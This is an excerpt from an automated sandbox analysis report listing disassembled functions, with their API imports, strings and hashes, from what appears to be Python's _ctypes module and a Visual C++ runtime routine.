Opcode Fuzzy Hash: 4b9e39d2e5c219fd7f77c84992df2d80c2fda8daf9d237960527683bdad92fae
Instruction Fuzzy Hash: A3514125A09FC785FA609F59E9602BA63B4EF4EBD4F04A035CB0E46364DE3CE549C340

Function 00007FF8B93C9A88 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 101COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93C9ABE
_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93C9AE7
PyMemoryView_FromObject.PYTHON311 ref: 00007FF8B93C9AF6
PyBuffer_IsContiguous.PYTHON311 ref: 00007FF8B93C9B1C
PyErr_SetString.PYTHON311 ref: 00007FF8B93C9B51
PyErr_Format.PYTHON311 ref: 00007FF8B93C9B84
PySys_Audit.PYTHON311 ref: 00007FF8B93C9BA5
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C9BD4

Strings

abstract class, xrefs: 00007FF8B93C9AB4
offset cannot be negative, xrefs: 00007FF8B93C9B47
Buffer size too small (%zd instead of at least %zd bytes), xrefs: 00007FF8B93C9B7A
ctypes.cdata/buffer, xrefs: 00007FF8B93C9B9E
O|n:from_buffer, xrefs: 00007FF8B93C9AE0
nnn, xrefs: 00007FF8B93C9B97
underlying buffer is not writable, xrefs: 00007FF8B93C9B0E
underlying buffer is not C contiguous, xrefs: 00007FF8B93C9B26

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$String$Arg_AuditBuffer_ContiguousDeallocFormatFromMemoryObjectParseSizeSys_Tuple_View_
String ID: Buffer size too small (%zd instead of at least %zd bytes)$O|n:from_buffer$abstract class$ctypes.cdata/buffer$nnn$offset cannot be negative$underlying buffer is not C contiguous$underlying buffer is not writable
API String ID: 3947696715-3790261066
Opcode ID: 6f91a64f5329831d1cdf7c4b25470fb5dbaa7ad2f9e3551f3ba25eea1f825ae0
Instruction ID: 65c8b8c936e131fc3a1f501ef0df5ab1e44cd0cc5f0b22aae1940c9c54373d5c
Opcode Fuzzy Hash: 6f91a64f5329831d1cdf7c4b25470fb5dbaa7ad2f9e3551f3ba25eea1f825ae0
Instruction Fuzzy Hash: F4416C65A09FC692EA64CF6EE8601BA23B5EF8DBD0F046131DB1D476A5DF2CE508C300

Function 00007FF8B93CD5F8 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 79threadCOMMON

Download Yara Rule

APIs

PyThreadState_GetDict.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD610
PyErr_SetString.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD62F
PyUnicode_InternFromString.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD660
PyDict_GetItemWithError.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD678
PyCapsule_IsValid.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD690
PyCapsule_GetPointer.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD6B0
PyErr_Occurred.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD6C1
PyMem_Calloc.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD6D6
PyCapsule_New.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD6F9
PyMem_Free.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD70A
PyDict_SetItem.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD722
_Py_Dealloc.PYTHON311(?,?,?,00007FF8B93C8759), ref: 00007FF8B93CD73E

Strings

_ctypes pymem, xrefs: 00007FF8B93CD686, 00007FF8B93CD6A6, 00007FF8B93CD6F2
ctypes.error_object is an invalid capsule, xrefs: 00007FF8B93CD69A
cannot get thread state, xrefs: 00007FF8B93CD61E
ctypes.error_object, xrefs: 00007FF8B93CD659

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Capsule_$Dict_Err_ItemMem_String$CallocDeallocDictErrorFreeFromInternOccurredPointerState_ThreadUnicode_ValidWith
String ID: _ctypes pymem$cannot get thread state$ctypes.error_object$ctypes.error_object is an invalid capsule
API String ID: 2323834031-3474121714
Opcode ID: accf9b440147d9a92cb32684a6abaa720b59604840fdd08eebf715022aa40aa7
Instruction ID: 8aa40705e4e0a61177c5d84a80cba8e08fc3b1ba90f1ce941a0b801a12cf3c7f
Opcode Fuzzy Hash: accf9b440147d9a92cb32684a6abaa720b59604840fdd08eebf715022aa40aa7
Instruction Fuzzy Hash: 9F311C20A0AFC681EA648F19E86413A23B4EF4DFD5B846435EB2E43764EF3CE559C310

Function 00007FF8B93C4118 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

PySequence_Tuple.PYTHON311 ref: 00007FF8B93C4130
PyTuple_New.PYTHON311 ref: 00007FF8B93C4157
_PyObject_LookupAttrId.PYTHON311 ref: 00007FF8B93C418A
PyErr_SetString.PYTHON311 ref: 00007FF8B93C8CDD
PyErr_Format.PYTHON311 ref: 00007FF8B93C8CFA
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8D10
PyErr_Format.PYTHON311 ref: 00007FF8B93C8D2A
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8D3B
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8D4C
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8D5B
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C8D61
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8D74

Strings

item %zd in _argtypes_ has no from_param method, xrefs: 00007FF8B93C8CF0
_argtypes_ has too many arguments (%zi), maximum is %i, xrefs: 00007FF8B93C8D1D
_argtypes_ must be a sequence of types, xrefs: 00007FF8B93C8CD3

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Err_$Format$AttrLookupObject_OccurredSequence_StringTupleTuple_
String ID: _argtypes_ has too many arguments (%zi), maximum is %i$_argtypes_ must be a sequence of types$item %zd in _argtypes_ has no from_param method
API String ID: 4102822968-1150265712
Opcode ID: b465a1dad8b079f441bebe69d373bb45d8456e0132b52fc939e0217758a31e23
Instruction ID: 7e41ff9d962894ac7f3702d2dc87b5b8e3902d4e984188fe9d98c1e81eaa6664
Opcode Fuzzy Hash: b465a1dad8b079f441bebe69d373bb45d8456e0132b52fc939e0217758a31e23
Instruction Fuzzy Hash: C141FA21A0DF8792EA659F29E85817A63B8EF9EFD5F046031DB0E46664DF3CE5498300

Function 00007FF8B93CD2E0 Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 104COMMON

Download Yara Rule

APIs

PyUnicode_FromFormat.PYTHON311 ref: 00007FF8B93CD350
PyUnicode_FromFormat.PYTHON311 ref: 00007FF8B93CD3F1
PyFloat_FromDouble.PYTHON311 ref: 00007FF8B93CD431
PyUnicode_FromFormat.PYTHON311 ref: 00007FF8B93CD44D
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CD45F

Strings

<cparam '%c' (%lld)>, xrefs: 00007FF8B93CD3E3
<cparam 0x%02x at %p>, xrefs: 00007FF8B93CD3D1
<cparam '%c' ('%c')>, xrefs: 00007FF8B93CD370
<cparam '%c' (%d)>, xrefs: 00007FF8B93CD346
<cparam '%c' (%R)>, xrefs: 00007FF8B93CD443
<cparam '%c' (%p)>, xrefs: 00007FF8B93CD3DA
<cparam '%c' at %p>, xrefs: 00007FF8B93CD3C8
<cparam '%c' (%ld)>, xrefs: 00007FF8B93CD3FD
<cparam '%c' ('\x%02x')>, xrefs: 00007FF8B93CD37E

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: From$FormatUnicode_$DeallocDoubleFloat_
String ID: <cparam '%c' (%R)>$<cparam '%c' (%d)>$<cparam '%c' (%ld)>$<cparam '%c' (%lld)>$<cparam '%c' (%p)>$<cparam '%c' ('%c')>$<cparam '%c' ('\x%02x')>$<cparam '%c' at %p>$<cparam 0x%02x at %p>
API String ID: 1798191970-1075073485
Opcode ID: e630b7be73e712d3a37526d796ee4f4f39b16323d62473f23fa0d0fb00351437
Instruction ID: 47a4736bc520874a596edc2971c357e2ea71694b7c9c74d3c4a10567fae4cd1e
Opcode Fuzzy Hash: e630b7be73e712d3a37526d796ee4f4f39b16323d62473f23fa0d0fb00351437
Instruction Fuzzy Hash: 2F418F2190CAC792E7799F2D946803F2A71EF5EBC4F182130E76E055A9DE2CF949C360

Function 00007FF8B93C9C0C Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 79COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93C9C49
_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93C9C6D
PyErr_SetString.PYTHON311 ref: 00007FF8B93C9C95
PyBuffer_Release.PYTHON311 ref: 00007FF8B93C9CA0
PyErr_Format.PYTHON311 ref: 00007FF8B93C9CD4
PySys_Audit.PYTHON311 ref: 00007FF8B93C9CF7
memcpy.VCRUNTIME140 ref: 00007FF8B93C9D2B
PyBuffer_Release.PYTHON311 ref: 00007FF8B93C9D38

Strings

abstract class, xrefs: 00007FF8B93C9C3F
offset cannot be negative, xrefs: 00007FF8B93C9C8B
ctypes.cdata/buffer, xrefs: 00007FF8B93C9CF0
Buffer size too small (%zd instead of at least %zd bytes), xrefs: 00007FF8B93C9CCA
nnn, xrefs: 00007FF8B93C9CE9
y*|n:from_buffer_copy, xrefs: 00007FF8B93C9C66

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$Buffer_ReleaseString$Arg_AuditFormatParseSizeSys_Tuple_memcpy
String ID: Buffer size too small (%zd instead of at least %zd bytes)$abstract class$ctypes.cdata/buffer$nnn$offset cannot be negative$y*|n:from_buffer_copy
API String ID: 2374319793-1742308441
Opcode ID: 2d8fddc9779f14f0481d8ddfd406fb15762d92becc72ec0614fe25a827832394
Instruction ID: 323f8fc57066ed483573ae2ccaf74e58443f3f4edac1690fae7676e9a26639bc
Opcode Fuzzy Hash: 2d8fddc9779f14f0481d8ddfd406fb15762d92becc72ec0614fe25a827832394
Instruction Fuzzy Hash: 71312965B19B8682EA648F5AE4646BA6374FF8DFC0F41A032DB4E53725DF2CE508C700

Function 00007FF8B93CC224 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 75COMMON

Download Yara Rule

APIs

_PyArg_NoKeywords.PYTHON311 ref: 00007FF8B93CC246
_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93CC272
PySequence_GetSlice.PYTHON311 ref: 00007FF8B93CC28C
PyObject_SetAttrString.PYTHON311 ref: 00007FF8B93CC2AB
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC2BC
PyObject_SetAttrString.PYTHON311 ref: 00007FF8B93CC2D5
PyObject_SetAttrString.PYTHON311 ref: 00007FF8B93CC2EE
PyObject_SetAttrString.PYTHON311 ref: 00007FF8B93CC307
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC322

Strings

details, xrefs: 00007FF8B93CC2FD
args, xrefs: 00007FF8B93CC2A1
OOO:COMError, xrefs: 00007FF8B93CC26B
text, xrefs: 00007FF8B93CC2E4
hresult, xrefs: 00007FF8B93CC2CB

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: AttrObject_String$Arg_Dealloc$KeywordsParseSequence_SizeSliceTuple_
String ID: OOO:COMError$args$details$hresult$text
API String ID: 4238450639-2065934886
Opcode ID: 7b88bc987767ef29d30f6af4a34bd6ec754f27a2cd5e2595f319dc9faf46bccc
Instruction ID: 9f3555692aaa84b4f217f58cdf70f0014c7a1680e413ff6c5e4afd0051cd211a
Opcode Fuzzy Hash: 7b88bc987767ef29d30f6af4a34bd6ec754f27a2cd5e2595f319dc9faf46bccc
Instruction Fuzzy Hash: 3E314A75A09B8692FA208F29F8501BA27B4FF8AFD4F486031DF0E47664DE2CE449C340

Function 00007FF8B93C45B8 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 68threadlibraryCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93C45DC
PySys_Audit.PYTHON311 ref: 00007FF8B93C45FD
PyUnicode_AsWideCharString.PYTHON311 ref: 00007FF8B93C460E
PyEval_SaveThread.PYTHON311 ref: 00007FF8B93C461C
LoadLibraryExW.KERNEL32 ref: 00007FF8B93C462F
PyEval_RestoreThread.PYTHON311 ref: 00007FF8B93C4646
PyMem_Free.PYTHON311 ref: 00007FF8B93C464F
PyLong_FromVoidPtr.PYTHON311 ref: 00007FF8B93C4669
GetLastError.KERNEL32 ref: 00007FF8B93C8E9A
PyErr_Format.PYTHON311 ref: 00007FF8B93C8EBD
PyErr_SetFromWindowsErr.PYTHON311 ref: 00007FF8B93C8ECB

Strings

Could not find module '%.500S' (or one of its dependencies). Try using the full path with constructor syntax., xrefs: 00007FF8B93C8EAE
U|i:LoadLibrary, xrefs: 00007FF8B93C45D5
ctypes.dlopen, xrefs: 00007FF8B93C45F6

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_Eval_FromThread$Arg_AuditCharErrorFormatFreeLastLibraryLoadLong_Mem_ParseRestoreSaveStringSys_TupleUnicode_VoidWideWindows
String ID: Could not find module '%.500S' (or one of its dependencies). Try using the full path with constructor syntax.$U|i:LoadLibrary$ctypes.dlopen
API String ID: 3805577924-808210370
Opcode ID: 8085d2a71d9d3a5a76fe34bec048b7c14a2e952a150ea8cd1b327b92dda5160e
Instruction ID: 7c7260b42869021c341fd4d19583bf870ed620e0e3d5490b516805ae82ba921b
Opcode Fuzzy Hash: 8085d2a71d9d3a5a76fe34bec048b7c14a2e952a150ea8cd1b327b92dda5160e
Instruction Fuzzy Hash: 3E212F61A0CBC691FAA49F6AE8641792765EF8EFD5F446035DB0E42264DE3CE549C300

Function 00007FF8B93CC5B0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 62COMMON

Download Yara Rule

APIs

PyUnicode_InternFromString.PYTHON311 ref: 00007FF8B93CC5CB
PyImport_ImportModule.PYTHON311 ref: 00007FF8B93CC5DF
PyErr_Clear.PYTHON311 ref: 00007FF8B93CC5ED
PyObject_GetAttrString.PYTHON311 ref: 00007FF8B93CC607
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC619
PyErr_WriteUnraisable.PYTHON311 ref: 00007FF8B93CC639
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC655
PyLong_AsLong.PYTHON311 ref: 00007FF8B93CC663
PyErr_Occurred.PYTHON311 ref: 00007FF8B93CC66B
PyErr_WriteUnraisable.PYTHON311 ref: 00007FF8B93CC68B
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC69F

Strings

_ctypes.DllCanUnloadNow, xrefs: 00007FF8B93CC5C4
DllCanUnloadNow, xrefs: 00007FF8B93CC5FD
ctypes, xrefs: 00007FF8B93CC5D8

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$Dealloc$StringUnraisableWrite$AttrClearFromImportImport_InternLongLong_ModuleObject_OccurredUnicode_
String ID: DllCanUnloadNow$_ctypes.DllCanUnloadNow$ctypes
API String ID: 3419117993-4136862661
Opcode ID: 6480632f02bad077a56764e5c1bb2d947567b6f8de28b8c217792b4108e53cfe
Instruction ID: 2d903168528f6e101999797e98f5b58851f792aa972478037479b8c855d02383
Opcode Fuzzy Hash: 6480632f02bad077a56764e5c1bb2d947567b6f8de28b8c217792b4108e53cfe
Instruction Fuzzy Hash: 7521AE31E09B8691FE649F29EA6423923B4AF5EFD5F483534DB0E46760DF2CA4599300

Function 00007FF8B9F6D5B0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 359COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF8B9F68B34), ref: 00007FF8B9F6DA16
DName::DName.LIBVCRUNTIME ref: 00007FF8B9F6DA55
swprintf_s.PGOCR ref: 00007FF8B9F6DA75
DName::DName.LIBVCRUNTIME ref: 00007FF8B9F6DA85
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6DAD5

Strings

`generic-method-parameter-, xrefs: 00007FF8B9F6DAA2
`template-type-parameter-, xrefs: 00007FF8B9F6DAF6
nullptr, xrefs: 00007FF8B9F6D799
lambda, xrefs: 00007FF8B9F6D974
`generic-class-parameter-, xrefs: 00007FF8B9F6DAE6
NULL, xrefs: 00007FF8B9F6D67D

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: NameName::$Name::operator+atolswprintf_s
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
API String ID: 2331677841-2441609178
Opcode ID: 9797e925e62f8d7d60f646e305733279f9163504f8593401decf67f28b7cb35e
Instruction ID: 4c55ef92c9dbcc719a790bb3bd4515925c42a3c976272473d887f5ac200c58c8
Opcode Fuzzy Hash: 9797e925e62f8d7d60f646e305733279f9163504f8593401decf67f28b7cb35e
Instruction Fuzzy Hash: 49F17F22E0C7C284FB149F7CC9951BC27A1AF467E6F052136CB4D26B95DE3CA944E361

Function 00007FF8B93C7FCF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 171COMMON

Download Yara Rule

APIs

PyUnicode_AsUTF8.PYTHON311 ref: 00007FF8B93C354C
PyMem_Malloc.PYTHON311 ref: 00007FF8B93C3585
PyMem_Free.PYTHON311 ref: 00007FF8B93C35D8
PyMem_Free.PYTHON311 ref: 00007FF8B93C35E1
PyObject_SetAttr.PYTHON311 ref: 00007FF8B93C366A
PyMem_Free.PYTHON311 ref: 00007FF8B93C36DA
PyErr_NoMemory.PYTHON311 ref: 00007FF8B93C7F82
PyErr_SetString.PYTHON311 ref: 00007FF8B93C802E
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8042
PyErr_Format.PYTHON311 ref: 00007FF8B93C80ED
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8101
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C811A

Strings

number of bits invalid for bit field, xrefs: 00007FF8B93C8024
%s:%s:, xrefs: 00007FF8B93C359A
bit fields not allowed for type %s, xrefs: 00007FF8B93C80D8

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Mem_$DeallocErr_Free$AttrFormatMallocMemoryObject_StringUnicode_
String ID: %s:%s:$bit fields not allowed for type %s$number of bits invalid for bit field
API String ID: 2455365098-3576608231
Opcode ID: 2c8a630497d9b26071984d54006c75933da3e15f2b28fdb68437a92c613d873a
Instruction ID: 1f63e997838c9b9816aea8c0e020b1c81493e9be8f13eb569ca8f009216cc443
Opcode Fuzzy Hash: 2c8a630497d9b26071984d54006c75933da3e15f2b28fdb68437a92c613d873a
Instruction Fuzzy Hash: F9815B32A09B8696EB50CF69E4582AA33B5FB4ABD8F402136DF1D57794DF38E549C300

Function 00007FF8B93CBA14 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_PyDict_GetItemIdWithError.PYTHON311 ref: 00007FF8B93CBA90
PyErr_Occurred.PYTHON311 ref: 00007FF8B93CBAA3

Part of subcall function 00007FF8B93CBA14: PySequence_GetItem.PYTHON311 ref: 00007FF8B93CBAE8
Part of subcall function 00007FF8B93CBA14: PySequence_GetItem.PYTHON311 ref: 00007FF8B93CBAFF
Part of subcall function 00007FF8B93CBA14: PyDict_Contains.PYTHON311 ref: 00007FF8B93CBB27
Part of subcall function 00007FF8B93CBA14: PyObject_SetAttr.PYTHON311 ref: 00007FF8B93CBB3C
Part of subcall function 00007FF8B93CBA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B93CBB4D
Part of subcall function 00007FF8B93CBA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B93CBB5C
Part of subcall function 00007FF8B93CBA14: PyErr_Format.PYTHON311 ref: 00007FF8B93CBB97
Part of subcall function 00007FF8B93CBA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B93CBBA6
Part of subcall function 00007FF8B93CBA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B93CBBC0

Strings

duplicate values for field %R, xrefs: 00007FF8B93CBB8A

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Item$Dict_Err_Sequence_$AttrContainsErrorFormatObject_OccurredWith
String ID: duplicate values for field %R
API String ID: 1919794741-1910533534
Opcode ID: f71277947be2d2287fba46fe0b915e6ba484f6932f6352b1fb4de12eb2f3b1be
Instruction ID: 7d4ae2c1236757fa529c323dc7d1a2384ff1c42fa13659268e04946f6a59a077
Opcode Fuzzy Hash: f71277947be2d2287fba46fe0b915e6ba484f6932f6352b1fb4de12eb2f3b1be
Instruction Fuzzy Hash: A6513F21A09F8681EE659F2AA95457A63B4AF59FE4F046131CF5E077A4EE3CE089C300

Function 00007FF8B93CD0A8 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 123threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON311(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8B93CD0EE
GetErrorInfo.OLEAUT32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8B93CD133
PyEval_RestoreThread.PYTHON311(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8B93CD190
ProgIDFromCLSID.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8B93CD1A3
Py_BuildValue.PYTHON311(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8B93CD1E5
PyErr_SetObject.PYTHON311(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8B93CD1FD
_Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8B93CD20C
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8B93CD215
SysFreeString.OLEAUT32 ref: 00007FF8B93CD224
SysFreeString.OLEAUT32 ref: 00007FF8B93CD233
SysFreeString.OLEAUT32 ref: 00007FF8B93CD242

Strings

iu(uuuiu), xrefs: 00007FF8B93CD1DE

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
